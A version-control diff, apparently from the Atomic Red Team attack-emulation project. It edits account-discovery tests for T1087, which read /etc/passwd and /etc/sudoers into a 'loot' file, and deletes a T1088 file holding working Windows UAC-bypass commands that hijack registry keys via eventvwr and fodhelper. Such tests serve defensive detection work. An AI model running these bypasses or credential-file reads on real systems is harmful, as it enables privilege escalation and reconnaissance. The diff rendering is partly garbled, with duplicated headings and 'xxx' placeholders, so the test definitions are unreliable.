Also, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: API monitoring, Process command-line parameters, Process monitoring
Permissions Required: User
Contributors: Travis Smith, Tripwire</blockquote>
## Atomic Tests
- [Atomic Test #1 - Enumerate all accounts](#atomic-test-1---enumerate-all-accounts)
- [Atomic Test #1 - List all accounts](#atomic-test-1---list-all-accounts)
- [Atomic Test #2 - View sudoers access](#atomic-test-2---view-sudoers-access)
- [Atomic Test #3 - View accounts with UID 0](#atomic-test-3---view-accounts-with-uid-0)
- [Atomic Test #4 - Show if a user account has ever logger in remotely](#atomic-test-4---show-if-a-user-account-has-ever-logger-in-remotely)
- [Atomic Test #4 - List opened files by user](#atomic-test-4---list-opened-files-by-user)
- [Atomic Test #5 - Enumerate users and groups](#atomic-test-5---enumerate-users-and-groups)
- [Atomic Test #5 - Show if a user account has ever logger in remotely](#atomic-test-5---show-if-a-user-account-has-ever-logger-in-remotely)
- [Atomic Test #6 - Enumerate users and groups](#atomic-test-6---enumerate-users-and-groups)
- [Atomic Test #6 - Enumerate Groups and users](#atomic-test-6---enumerate-groups-and-users)
- [Atomic Test #7 - Enumerate all accounts](#atomic-test-7---enumerate-all-accounts)
- [Atomic Test #7 - Enumerate all user accounts](#atomic-test-7---enumerate-all-user-accounts)
- [Atomic Test #8 - Enumerate all accounts via PowerShell](#atomic-test-8---enumerate-all-accounts-via-powershell)
- [Atomic Test #8 - Enumerate all user accounts - PowerShell](#atomic-test-8---enumerate-all-user-accounts---powershell)
- [Atomic Test #9 - Enumerate logged on users](#atomic-test-9---enumerate-logged-on-users)
- [Atomic Test #9 - Get logged on Users](#atomic-test-9---get-logged-on-users)
- [Atomic Test #10 - Enumerate logged on users via PowerShell](#atomic-test-10---enumerate-logged-on-users-via-powershell)
- [Atomic Test #10 - Get logged on users PowerShell](#atomic-test-10---get-logged-on-users-powershell)
<br/>
## Atomic Test #1 - Enumerate all accounts
Enumerate all accounts by copying /etc/passwd to another file
## Atomic Test #1 - List all accounts
xxx
**Supported Platforms:** Linux, macOS
@@ -78,7 +90,7 @@ cat /etc/sudoers > #{output_file}
<br/>
## Atomic Test #3 - View accounts with UID 0
List opened files by user
xxx
**Supported Platforms:** Linux, macOS
@@ -88,6 +100,19 @@ List opened files by user
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
```
<br/>
<br/>
## Atomic Test #4 - List opened files by user
xxx
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
@@ -95,8 +120,8 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
<br/>
<br/>
## Atomic Test #4 - Show if a user account has ever logger in remotely
Show if a user account has ever logger in remotely
## Atomic Test #5 - Show if a user account has ever logger in remotely
xxx
**Supported Platforms:** Linux, macOS
@@ -113,8 +138,8 @@ lastlog > #{output_file}
<br/>
<br/>
## Atomic Test #5 - Enumerate users and groups
Utilize groups and id to enumerate users and groups
## Atomic Test #6 - Enumerate Groups and users
utilize local utilities to identify users and groups
**Supported Platforms:** Linux, macOS
@@ -123,18 +148,6 @@ Utilize groups and id to enumerate users and groups
```
groups
id
```
<br/>
<br/>
## Atomic Test #6 - Enumerate users and groups
Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
#### Run it with `sh`!
```
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
@@ -144,8 +157,8 @@ dscacheutil -q user
<br/>
<br/>
## Atomic Test #7 - Enumerate all accounts
Enumerate all accounts
## Atomic Test #7 - Enumerate all user accounts
List all accounts
**Supported Platforms:** Windows
@@ -162,8 +175,8 @@ net localgroup
<br/>
<br/>
## Atomic Test #8 - Enumerate all accounts via PowerShell
Enumerate all accounts via PowerShell
## Atomic Test #8 - Enumerate all user accounts - PowerShell
List all accounts with PowerShell
**Supported Platforms:** Windows
@@ -185,8 +198,8 @@ net localgroup
<br/>
<br/>
## Atomic Test #9 - Enumerate logged on users
Enumerate logged on users
## Atomic Test #9 - Get logged on Users
List logged on users
**Supported Platforms:** Windows
@@ -198,8 +211,8 @@ query user
<br/>
<br/>
## Atomic Test #10 - Enumerate logged on users via PowerShell
Enumerate logged on users via PowerShell
## Atomic Test #10 - Get logged on users PowerShell
List logged on users powershell
**Supported Platforms:** Windows
atomics/T1087/T1087.yaml
+20 -28
View File
@@ -1,11 +1,11 @@
---
---
attack_technique: T1087
display_name: Account Discovery
display_name: Account Discovery
atomic_tests:
- name: Enumerate all accounts
- name: List all accounts
description: |
Enumerate all accounts by copying /etc/passwd to another file
xxx
supported_platforms:
- linux
- macos
@@ -37,7 +37,7 @@ atomic_tests:
- name: View accounts with UID 0
description: |
View accounts wtih UID 0
xxx
supported_platforms:
- linux
- macos
@@ -49,9 +49,11 @@ atomic_tests:
executor:
name: sh
command: |
grep 'x:0:' /etc/passwd > #{output_file} - name: List opened files by user
grep 'x:0:' /etc/passwd > #{output_file}
- name: List opened files by user
description: |
List opened files by user
xxx
supported_platforms:
- linux
- macos
@@ -62,7 +64,7 @@ atomic_tests:
- name: Show if a user account has ever logger in remotely
description: |
Show if a user account has ever logger in remotely
xxx
supported_platforms:
- linux
- macos
@@ -76,9 +78,9 @@ atomic_tests:
command: |
lastlog > #{output_file}
- name: Enumerate users and groups
- name: Enumerate Groups and users
description: |
Utilize groups and id to enumerate users and groups
utilize local utilities to identify users and groups
supported_platforms:
- linux
- macos
@@ -88,25 +90,15 @@ atomic_tests:
command: |
groups
id
- name: Enumerate users and groups
description: |
Utilize local utilities to enumerate users and groups
supported_platforms:
- macos
executor:
name: sh
command: |
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
dscacheutil -q group
dscacheutil -q user
- name: Enumerate all accounts
- name: Enumerate all user accounts
description: |
Enumerate all accounts
List all accounts
supported_platforms:
- windows
executor:
@@ -119,9 +111,9 @@ atomic_tests:
net localgroup "Users"
net localgroup
- name: Enumerate all accounts via PowerShell
- name: Enumerate all user accounts - PowerShell
description: |
Enumerate all accounts via PowerShell
List all accounts with PowerShell
supported_platforms:
- windows
executor:
@@ -139,9 +131,9 @@ atomic_tests:
get-localgroup
net localgroup
- name: Enumerate logged on users
- name: Get logged on Users
description: |
Enumerate logged on users
List logged on users
supported_platforms:
- windows
executor:
@@ -149,9 +141,9 @@ atomic_tests:
command: |
query user
- name: Enumerate logged on users via PowerShell
- name: Get logged on users PowerShell
description: |
Enumerate logged on users via PowerShell
List logged on users powershell
supported_platforms:
- windows
executor:
atomics/T1088/T1088.md
-103
View File
@@ -1,103 +0,0 @@
# T1088 - Bypass User Account Control
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1088)
<blockquote>Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)
Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Bypass UAC using Event Viewer](#atomic-test-1---bypass-uac-using-event-viewer)
- [Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell](#atomic-test-2---bypass-uac-using-event-viewer---powershell)
- [Atomic Test #3 - Bypass UAC using Fodhelper](#atomic-test-3---bypass-uac-using-fodhelper)
- [Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell](#atomic-test-4---bypass-uac-using-fodhelper---powershell)
<br/>
## Atomic Test #1 - Bypass UAC using Event Viewer
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
<br/>
<br/>
## Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```
<br/>
<br/>
## Atomic Test #3 - Bypass UAC using Fodhelper
Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
```
<br/>
<br/>
## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell
PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
```
<br/>

Some files were not shown because too many files have changed in this diff Show More